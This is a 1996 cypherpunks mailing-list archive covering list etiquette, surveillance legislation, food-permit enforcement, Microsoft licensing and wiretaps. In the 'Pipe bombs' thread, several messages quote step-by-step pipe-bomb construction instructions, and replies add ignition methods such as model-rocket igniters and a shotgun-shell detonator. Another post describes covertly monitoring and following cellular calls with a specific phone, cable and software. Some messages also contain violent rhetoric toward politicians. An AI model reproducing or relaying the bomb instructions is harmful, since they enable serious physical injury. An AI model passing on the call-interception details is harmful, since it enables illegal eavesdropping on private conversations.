From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Omegaman" <omega@bigeasy.com>
Date: Sat, 3 Aug 1996 06:58:46 +0800
To: cypherpunks@toad.com
Subject: Re: Silliness on cypherpunks
Message-ID: <199608021958.OAA02684@betty.bigeasy.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> The first issue is the seemingly sincere attempts at answering questions
> that are obviously irrelevant.  IMO cypherpunks are not "Mr. Answer Man"
> for every question someone has regarding computers or electrical
> engineering.  Sure, most of us are pretty capable of answering these
> questions - that doesn't mean that we should.  

At most, they might be privately directed to the appropriate URL or 
other reference.  Some take the time to answer such questions by 
providing an exercise which should lead the individual to the answer.  

Chances are, though, that they're perfectly aware of Schneir's book 
and numerous other FAQ's of relevance.  That means most likely we're 
dealing with laziness - which does not deserve a response

> Whenever I asked a silly
> question at home, my dad used to tell me - "look it up".  The process of
> finding the answer was actually far more important than the answer itself. 
> We should attempt to ignore these kinds of questions.  Maybe eventually
> they will go away.

I believe that's called "learning."  Unfortunately, far too many 
people engage in what I call "willful ignroance."   

I'm not an engineer.  I'm not a mathmetician.  I don't fully 
understand everything I've read here.  If I'm interested, however, I 
look further and read up on the subject so I can make informed 
queries if needed.

Some seem to think that this list is cruel to newcomers by posting 
sarcastic responses to newbie inquiries.  This list assumes some 
amount of prior knowledge on the part of it's members.  It is not the 
place for "what does PGP stand for?" questions.

> My other "peeve of the day" is the wonderful introduction of the "mee too"
> postings to cypherpunks. 

me too.

 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgJSYab3EfJTqNC9AQHXqwP/YUx5mtuDZTV4G6T//DsOZHtWqKo19+sN
mUEWKFa0DkErukEXnNIhSXgQjtkknp/AJEP2UQ04JE5cIoVB8ti2tpeB+qLFJUvi
pd149EYzQC+da0l0rSDWARtciWv642ZX5fdrCn7388tpxnCsTlnSLziaQVM7E9+S
ZZ2etwMCQd8=
=796N
-----END PGP SIGNATURE-----
-----------------------------------------------------------------------------------------
 Omegaman <omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2  
                            59 0A 01 E3 AF 81 94 63 
send a message with the text "get key" in the "Subject:"
field to get a copy of my public key.
-------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 08:09:34 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS
Message-ID: <ae27b98904021004e701@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:39 PM 8/2/96, Sandy Sandfort wrote:

>I find it amusing that the law is supposedly so concerned with
>food purity for the "homeless."  Hang out near a fast-food place
>sometime and watch the street people dumpster dive for the
>half-eaten remains of other people's Big Macs.  That is the true
>alternative to volunteer feeding programs.  (That, or getting a
>job.)

I thought the point you were about to make when you said "Hang out near a
fast-food place..." is that a _lot_ of "roach coaches" are much filthier
than any "Food Not Bombs" soup kettle I've ever seen.

(Fortunately, people survive all kinds of dirt and germs. If dogs and cats
can eat stuff off the floor, and our ancestors did before hot water, soap,
and autoclaves, then so can we. Not to mention children. But I digress.)

The use of zoning and health code ordnances to harass certain classes of
people is nothing new. Like I said, the Boy Scout Cookout and similar
"good" events are not bothered by City Inspectors descending on them to
shut them down.

>The truth is that local officials are perverting the health codes
>to harass these operations, not to "protect the homeless."  At
>it's core, it is a hypocritical abuse of power, not unlike the
>invocation of the Four Horseman to keep strong crypto out of the
>hands of average Americans.

Further, in time past the operation of a "street food" service (hot dogs,
ice cream, various knoshing items, etc.) was a way for otherwise poor
persons to start a business. My own city, Santa Cruz, has no pushcart
vendors, and only one officially-approved sidewalk hotdog vendor. A loss
for us, a loss for would-be vendors, and with no gain in "food safety" that
I can plausible see.

I actually think this shows another side of the harassment of food
giveaways and low-cost vendors: it cuts down on competition with the
established food entities. While I tend to dismiss "corporate conspiracy"
theories about how Giant Corporations are repressing and suppressing the
Little Guys, there is little doubt that licensing, zoning, and other
governmental restrictions are often used by established entities to keep
out competition. Licenses get used for what economists call "rent-seeking"
behavior.

(Examples abound in other areas, too, such as where large chip companies
like Intel actually relish the vast amounts of paperwork they are required
to fill out, becuase this overhead and legal burden can be handled by their
buildings full of paper pushers, but helps to keep small companies from
entering the market. Intel has actually insisted that small companies file
the same environmental impact reports, labor reports, etc., that they have
to fill out. Understandable at one level, but also an example of using "the
system" to put pressure on upstarts. Or, the rent-seeking of professional
guilds, well-known to all of us.)

As to Alan Horowitz's bizarre notion that "public streets" are not to be
used for giving away food, does he believe the same to be true of giving
away speech, giving away ideas, passing books to other people, etc.? "There
are bookstores for selling or buying books, and anyone who engages in this
sort of action on a public street will have his attitude adjusted with my
billy club."

"Public" areas cause problems for analysis of rights, I will grant. The
"commons problem" is well known. But I think that the specific cases we've
been discussing, of whacking bums with nightsticks for the crime of not
maintaining "proper decorum," and of Food Not Bombs being shut down while
the Boy Scouts are not, are clear cases where the law is being misapplied.

(Were I a lawyer, and had the Food Not Bombs case come to trial, I would've
collected evidence that a large number of other groups were not sanctioned
for not having food preparation permits, and I would've argued it was a
case of "selective enforcement" for political reasons.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 07:48:33 +0800
To: cypherpunks@toad.com
Subject: Re: URGENT: Surveillance Bill Gets New Life - House Vote lLikely TODAY!
Message-ID: <ae27bf7d050210044d20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:06 PM 8/2/96, Jonah Seiger wrote:

>It's not over yet....
>
>The House has scheduled a vote on "suspension" for a 'counter-terrorism'
>bill TODAY (Friday).
>
>Despite media reports that the negotiations had stalled out, house
>Republicans have apparently worked out their differences and are set to
>vote on the bill today.  The Senate may or may not vote on the measure on
>Saturday.
>
>No one I've talked to knows for sure what's in the bill, though I have
>heard that there are no encryption provisions and that some of the wiretap
>proposals have been scaled back.

I doubt any of the Congressjerks know what's in the thing they've voting
on, either. This is the American way: wait 'til the last minute, pull a
couple of "all nighters," go on vacation, and then claim ignorance. It
worked when we were in school, so, hey, why not run the government the same
way?

("I had no idea of what was in the Communications Decency Act...it just
sounded like the "decent" thing to vote for."....."You mean the
Anti-Terrorism Bill suspends habeus corpus? What's that? I'll ask my
staffers to look into it.")

Fuck 'em all. Fawkes had it wrong...they're not worth the powder to blow
'em to hell.

All we can do is work on technological workarounds. Making their $2 billion
Wiretap Boondoggle a worthless exercise is a start.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 3 Aug 1996 06:00:47 +0800
To: svmcguir@syr.edu>
Subject: Re: Information gathering by news servers
In-Reply-To: <ML-2.2.839003612.7349.scott@homebox>
Message-ID: <Pine.LNX.3.95.960802141613.1319A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 2 Aug 1996, Scott McGuire wrote:

> How much information about what someone reads can be gathered
> by a news server?  Is there an anonymous way to read a public
> news server, or would a server have to be set up intentionally
> to allow anonymous reading?

It depends on how much logging the news server software does.  For INN, it
logs the hostname of every client that invokes the "group" command.  This
means that if you are on a machine that uses identd or on a SLIP/PPP account,
it is possible to also find out the complete email address.  I suppose hacking
the news software could allow a news admin to find out every article you read,
but the log would be very large.  The best way to read news anonymously is
to either get an anonymous shell account that has a full news feed, or get an
account on a trusted NNTP server.  An NNTP server could be setup to not log
at all by commenting out all the calls to syslog().

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMgJHT7Zc+sv5siulAQHZ8gP+NywhqrmlOls1ibbpdXac0qp7/LacT+2j
UXiBare4Lk0qOJAM9UUAc+xbyzxAugdWwLAyo2NW8Bi5ZK1QojFvCKvHcQzWYNA6
baz7Qmy9x7Beup6HG+7M/bOmGonjml+ZSXbWAFMuSmItd5V2vZRmqBGdu8oglY7m
MiGmXLaLkFw=
=To5D
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 08:05:32 +0800
To: cypherpunks@toad.com
Subject: Re: Pipe bombs
Message-ID: <v02120d02ae281b5c5141@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:02 8/1/96, Timothy C. May wrote:

>Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
>ends.  Buy two metal caps to fit.  These are standard items in hardware
>stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
>good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
>on one end. Fill the pipe to within 1/2 inch of the top with black powder.
>Do not pack
>the powder. Don't even tap the bottom of the pipe to make it settle.  You want
>the powder loose.  For maximum explosive effect, you need dry, fine powder
>sitting loose in a very rigid container.

I do believe you forgot the fuse... Electrical ignition elements, such as
the ones used to launch model rockets should work just fine.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 10:07:18 +0800
To: cypherpunks@toad.com
Subject: Re: Pipe bombs
Message-ID: <ae27c15006021004bae3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 PM 8/2/96, Lucky Green wrote:
>At 21:02 8/1/96, Timothy C. May wrote:
>
>>Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
...

>I do believe you forgot the fuse... Electrical ignition elements, such as
>the ones used to launch model rockets should work just fine.


Actually, all I did was copy the first couple of paragraphs from the very
first set of instructions I found, found by using Alta Vista to search the
Web on the string "pipe bomb". That's what turned up.

(I guess I should've put quote marks around it and given a URL, but I was
in a rush to generate my felonious alternate .sig. I'll correct it now.)


--Tim

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 3 Aug 1996 09:53:43 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <199608021800.LAA10722@toad.com>
Message-ID: <Pine.GUL.3.95.960802144216.790I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 2 Aug 1996, some provocateur impersonating Bill Stewart wrote:

> Tim wrote:
> > Actually approving of disapproving a piece of software for sale 
> > to U.S. citizens is not currently possible.
> 
> Sure.  The Commerce Klaus of the Constitution lets them do it
> if they want to, though that required Congressional cooperation.

That would certainly be less of a stretch than some other commerce clause
cases. Crypto can be used interstate, and there's a compelling state
interest in form of The Four Horsemen. Heck, we should all thank our lucky
stars that our freedom-loving congresscritters let us use computers at all.
I believe it was Wickard who was told he couldn't grow food to feed his own
pigs because the government has a compelling state interest in keeping
interstate food prices high. Surely terrorism and kiddie porn, which is all
people ever use the net (let alone crypto) for, are even more important than
high food prices. 

> 	TRUST NO ONE!

Indeed.

- -rich
 fucking statist

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMgJ4j5NcNyVVy0jxAQE/yAH+O3HErmEi9TrEJaBbmb6u0K/1du34t4MQ
cByjhW5poJlrb5CLtPAt/5nOaWYlwvlEtvXSckbn1DJPN5ry4kXVvw==
=0sLc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 3 Aug 1996 09:17:08 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defc
Message-ID: <TCPSMTP.16.8.2.15.11.18.2645935021.658751@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> They said that every other time their comrades had come to defcon,
 In> they had tried to come incognito, and got caught every time.  This
 In> time, they wore FBI t-shirts, and the only response was "Hey! Where'd
 In> ya get the T-Shirt?!?". They said "We hacked 'em from the FBI" and that
 In> was it, noone suspected... =) 

 I would love to get my hands on "I spotted the Fed" and "I am a Fed"
 (or whatever they say) T-Shirts...


 P.J.
 pjn@nworks.com




... A man without a religion is like a fish without a bicycle.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 3 Aug 1996 06:23:25 +0800
To: cypherpunks@toad.com
Subject: Courtesy, Clubs and Clinton
Message-ID: <9607028390.AA839024095@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from http://www.msnbc.com/news/21324.asp
Clinton's golf war 
Teed-off clubbers grumble president plays too slow, disrupts things

Congressional Country Club Secretary Tim May confirms that 
some members have complained about the president, but insists that 
"more members are delighted the president is playing at our club."
_________

Is there something that Tim isn't telling us? ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 3 Aug 1996 06:27:22 +0800
To: grafolog@netcom.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <9608021922.AA06774@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


> From grafolog@netcom.com Fri Aug  2 11:48:53 1996
> Date: Fri, 2 Aug 1996 15:48:47 +0000 (GMT)
> From: jonathon <grafolog@netcom.com>
> X-Sender: grafolog@netcom10
> To: "Paul J. Bell" <pjb@ny.ubs.com>
> Subject: Re: fbi, crypto, and defcon
> X-No-Archive: yes
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Content-Length: 772
> 
> 	Paul:
> 
> On Fri, 2 Aug 1996, Paul J. Bell wrote:
> 
> > in general, i suspect that the rip-off is going the other way. after all, 
> > no one forces anyone buy from microsoft, AT&T, etc., but people do steal from
> 
> 	When I purchased my computers, I had to pay $150 to not have
> 	Windows and Dos installed on them.  That $150 went to Microsoft.
> 	It seemed to me that I was being ripped off, by Microsoft.
> 
> 	As far as AT&T goes, do you know how to determine what their
> 	lowest residential rate is?   Secondly, do you know how to
> 	sign up for it?  
> 	
> 
>         xan
> 
>         jonathon
>         grafolog@netcom.com
> 
> 
> 
> 	Illiterate: adj.  Inability to read write or speak five 
> 	or fewer languages.
> 	Funksioneel Ongeleerd:  a.  Die wat kon nee elf or meer tale 
> 	lees, skryf and gesprek. 
> 
> 
> 

as i said, i have no use for microsoft, whats more, i don't use microsoft. 
that said, if a person really must pay to not have their products installed, 
i agree that that is intorelable, and at the least calls for finding a new vendor
for computers. if you really don't plan to use dos or windows, there is 
no reason why you should pay for them. frankly, this sounds like a real stupid
move on the part of your hardware vendor. maybe you need to shop around.

as for at&t, no, i don't know the lowest residential rate, but i'm sure that
the rate varies depending on your long distance calling pattern. i'm sure that
the rate is less for someone who rarely makes an ld call but wants to have the 
ability to do so when and if the need/desire arises then for someone who makes 
a few call per month and for another user who makes a lot of call each month. 
at any rate, all you need to do is to ask them for the lowest rate for your 
calling pattern, and if you don't like the answer, hang up and call mci, s
print, etc. at least thats better than microsoft, where you don't have a lot 
of choice.

take a quick look around the world, paying particular attention to those many 
countries where the telephone company was directly controlled by the government. 
was the service they provided really great? was it cheap? did they every provide 
anything new or improved?  as one who has spent a lot of time in some of these
countries i can answer from experience, hell no.  a one time, in the late 50's 
i lived and worked in a certain west african country. th erule was, taht the first
person in the office in the morning would take the phone off the hook, and maybe 
by 10:30 or 11:00 we would get a dial tone. of course, you would never hang the 
thing up again taht day, just pass it along to anyone else that needed to make a 
call.  egypt and all of france was not a lot better. as late as 1983 it was a real 
challenge to get a phone installed or make a long distance call in france.  
no matter what the french say, telecommunications services still suck in france.

i agree with you that a lot of companies do gouge the customer for all that they
can get, and maybe AT&T is one of them, but maybe not.  

i have spent my entire working life providing for myself, asking and taking nothing 
from anyone, other than what i earned for myself. i payed for my education and for 
everything else that i ever had.  however, once i had the money to invest, i did 
so, in, among others, AT&T, and since i take a chance with the money that i worked 
for by investing in them, i, by god, expect a return on my investment, and if AT&T 
can't provide it, i will dump them and take my chances elsewhere.  however, 
whether its AT&T or someone else, if i risk my money, i expect something in 
return, and i can only expect that if the company (AT&T or who ever) makes a
profit.  profit is not a dirty word, it is what makes it all possible. AT&T did 
not build the worldwide network that serves us all for fun, not did they invent 
the transistor or UNIX, or all the other thinks that we take for granted just for 
the fun of it, or without risk.  if you take the risk, you deserve a return on 
your investment.  i have yet to meet a stockholder who said that they were satisfied with any given profit level and wished the company to give away goods or services 
rather then increase the dividends to the stockholders.  the name of the game is 
PROFIT, its what keeps us all alive and employed. the real saving grace is in having a choice.

i am not suggesting that as long as a company makes a profit that anything goes.  
what i am suggesting is that a company, or an individual for that matter is
only obliged to see to there own well being.  if an individual so chooses, they
may spend their life, or any portion thereof, working for the good of someone
else, or giving the results of all their labors to others, as they choose.  in 
many ways this is a good thing and is what makes civilized life.  however, i
do not believe that it is ever permissable to dictate to an individual or to 
a company which is, after all, only the sum of it's employees and stockholders,
the requirement or terms of how they will dispense the profits of their labors.

if AT&T or any other company doesn't give you what you want, tell them to fuck-off,
and take your business elsewhere.

oh that we could so easily deal with a government that provides so little of what
the people want.  i think that it is rare for a company to forget who is really
calling the shots, but our very own government seems to be completly unaware
that they exist to serve us, not the other way around. they seem to have forgotten
that the purpose of the constitution is not to define what rights are given to the 
people, but rather to define what powers the people give to the government.


cheers,
	-paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 09:14:41 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps
Message-ID: <v02120d03ae2823f85701@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:52 8/2/96, David Wagner wrote:

>I don't get it.  Help me out here-- how can this possibly be constitutional?
>
>I'm reading the Fourth Amendment to our honored Constitution of the United
>States, which proclaims
>
>        [...]
>        no warrants shall issue,
>        but upon probable cause,
>        supported by oath or affirmation,
>        and *particularly describing the place to be searched*,
>        and the persons or things to be seized.
>
>Are we just to strike out that emphasized phrase?  What's going on here?
>Someone tell me I'm not just having a bad nightmare.

The Fourth Amendment has been abolished by the Supreme Court for all
intends and purposes. It remains listed in the Constitution for historic
reasons only.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwoelbel@midwest.net (W.K. Woelbeling)
Date: Sat, 3 Aug 1996 07:24:50 +0800
To: cypherpunks@toad.com
Subject: List for crypto minus political rubbish
Message-ID: <199608022025.PAA02349@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for a source of info on crypto.  While this list is of interest
to (many) people, I find that the amount of political ranting outweighs any
nuggets of information concerning cryptography.  Pointers?

Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Sat, 3 Aug 1996 08:53:41 +0800
To: mpd@netcom.com
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <9608022229.AA07237@lada>
MIME-Version: 1.0
Content-Type: text/plain


>The current Thinking Machines is a software firm, and Daniel Hillis is no
>longer amongst the top management.  The name lives on, but the business
>of designing, building, and selling exotic supercomputers is kaput.

>Not an uncommon story in the computer business.  Even Control Data
>Corporation still exists in a transmogrified form, although their
>mainframe business went up in smoke ages ago. 

MasPar still exists as a software company, they changed the name
however.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Aug 1996 08:03:58 +0800
To: Simon Spero <m5@vail.tivoli.com>
Subject: Re: Bombs & bomb threats in LA
Message-ID: <2.2.32.19960802192913.0087dccc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 8/2/96 -0400, Simon Spero wrote:

>IP is the Flame, TCP is the Fuse, HTTP is the Bomb

That'd be HTTPS wouldn't it.
              ^
DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Aug 1996 06:41:44 +0800
To: artichoke bill <cypherpunks@toad.com
Subject: Re: privacy is a SMOKESCREEN.
Message-ID: <2.2.32.19960802193411.0087b680@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


See.  Right-wing nuts are good for something.

>from eff:
>
>CNN reports: "Key members of the Senate blamed House conservatives for 
>the failure, saying they had insisted on linking proposed new
>wiretapping authority for the FBI to an expansion of privacy laws."
>
>CNN quotes Rep. Charles Schumer (D-NY) as saying that House Republican
>leaders "have come up with this smokescreen called privacy".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 3 Aug 1996 06:42:34 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: Tolerance
In-Reply-To: <199608012148.OAA21170@cygnus.com>
Message-ID: <199608021936.PAA10161@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Chris Adams" writes:
> Just a comment to all of the 'true libertarians' out there, especially
> the "defend to the death" types:  How many of you defended Mr.
> Sternlight's recent membership?

Libertarianism means that you oppose *government* censorship -- not
that you feel obligated to listen to every idiot who comes down the
street.

In other words -- I defend to the death the right of David Sternlight
to say anything he likes. However, thats very different from feeling
that anyone is required to listen, or saying that a privately run
forum must tolerate him.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 09:15:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: SOUP KITCHENS
In-Reply-To: <ae27b98904021004e701@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960802153051.29996C-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Timothy C. May wrote:

> I actually think this shows another side of the harassment of
> food giveaways and low-cost vendors: it cuts down on competition
> with the established food entities...there is little doubt that
> licensing, zoning, and other governmental restrictions are often
> used by established entities to keep out competition.

A most distastful example is the complicit silence of gun stores
when the gun grabbers regulate "kitchen table" gun dealers out of
economic existance.

	"When they came for the communists, I said nothing
	 because I wasn't a communist..."


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 3 Aug 1996 06:54:50 +0800
To: cypherpunks@toad.com
Subject: my message Re: fbi, crypto, and defcon
Message-ID: <9608021947.AA06865@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


in my earlier message of this date, i said:

>"i have spent my entire working life providing for myself, asking and taking nothing
>from anyone, other than what i earned for myself. i payed for my education and for
>everything else that i ever had."

maybe i should have taken something, then i would have learned to spell. yes, i
know that the correct spelling is 'paid', not 'payed', but sometimes, (often?),
my fingers outrun my brain. does this, you ask, also account for the lack of
uppercase characters? no, it's just my style, maybe its really laziness.

cheers,
	-paul


ps. you will undoubtly also find a few tath, thta, teh, and the like.
 maybe if i used that microsoft stuff with the spell checker rather than the 
sun mailtool i could present myself without the plethora of typos. sigh. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 3 Aug 1996 10:18:12 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <9608021922.AA06774@sherry.ny.ubs.com>
Message-ID: <m2lofxtlhl.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Paul" == Paul J Bell <pjb@ny.ubs.com> writes:

jonathon> When I purchased my computers, I had to pay $150 to not have
jonathon> Windows and Dos installed on them.  That $150 went to Microsoft.
jonathon> It seemed to me that I was being ripped off, by Microsoft.

Paul> as i said, i have no use for microsoft, whats more, i don't use
Paul> microsoft.  that said, if a person really must pay to not have
Paul> their products installed, i agree that that is intorelable, and
Paul> at the least calls for finding a new vendor for computers. if
Paul> you really don't plan to use dos or windows, there is no reason
Paul> why you should pay for them. frankly, this sounds like a real
Paul> stupid move on the part of your hardware vendor. maybe you need
Paul> to shop around.

This is exactly what a new lawsuit recently filed against Microsoft is
about.  See
	http://www.caldera.com/news/pr001.html
for details.

They've already had their hand slapped for the per-processor license
agreements they pushed in the early '90s.  The per-processor licenses
were where Microsoft forced hardware vendors to pay a certain fee
based on CPUs sold regardless of what system software was delivered on
them.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 3 Aug 1996 09:16:55 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Pipe bombs
In-Reply-To: <ae26cc41120210042fbf@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960802111806.1649A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Timothy C. May wrote:
> Fuck them. Fuck Swinestein, Klinton, Gingrich, and all the rest. And fuck
> Dole. (On second thought, don't--it might not be a survivable experience.)

    Unsurvivable for which party?

> 
> I say they've all earned only our contempt.

     A long time ago. 
 
> It's time to accelerate our efforts to undermine this foolish experiment in
> pandering to the masses.

    Tell us how o' wise one. 
  
> --Tim May
 
> Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
> ends.  Buy two metal caps to fit.  These are standard items in hardware
> stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
> good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
> on one end. Fill the pipe to within 1/2 inch of the top with black powder.
> Do not pack
> the powder. Don't even tap the bottom of the pipe to make it settle.  You want
> the powder loose.  For maximum explosive effect, you need dry, fine powder
> sitting loose in a very rigid container.

     What about fusing? Mechinical detonation with a shotgun shell, or 
electrical with a model rocket engine?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 3 Aug 1996 10:27:57 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps
Message-ID: <2.2.32.19960802234117.006acb90@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 AM 8/2/96 +0000, you wrote:
>>P.S.  Do police really need a search warrant to wiretap cellular phones?
>
>It is my understanding that police need a warrant to tap *cellular* 
>phones, but not *wireless* phones.
>
>One should understand that monitoring cellular traffic is *much* more 
>difficult than tapping a conventional phone, because as the user 
>moves around in the service area the phone switches to different 
>repeaters, often several times during a conversation.

I'd have to disagree on that point.  Monitoring cellular traffic requires
nothing more than a cellular phone, and some software which enables
you to follow calls through the cells, for a total cost of about $500. 
This is exceptionally trivial with an Oki 900 and a ctek cable (which 
interfaces the fone with the computer).  
With this software you can monitor individual cells, choosing to "lock
on" to a call made from a specific number, or to a specific number.  You
can follow calls, and record any dtmf digits.  Also the caller will never 
be made aware that he/she is being listened to.  
A sophisticated land line wiretap that will not be detectable by the 
average citizen will cost well over $500, plus you have to install it 
without the target knowing, etc.  
//cerridwyn//






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 3 Aug 1996 09:15:09 +0800
To: Alan Horowitz <alanh@infi.net>
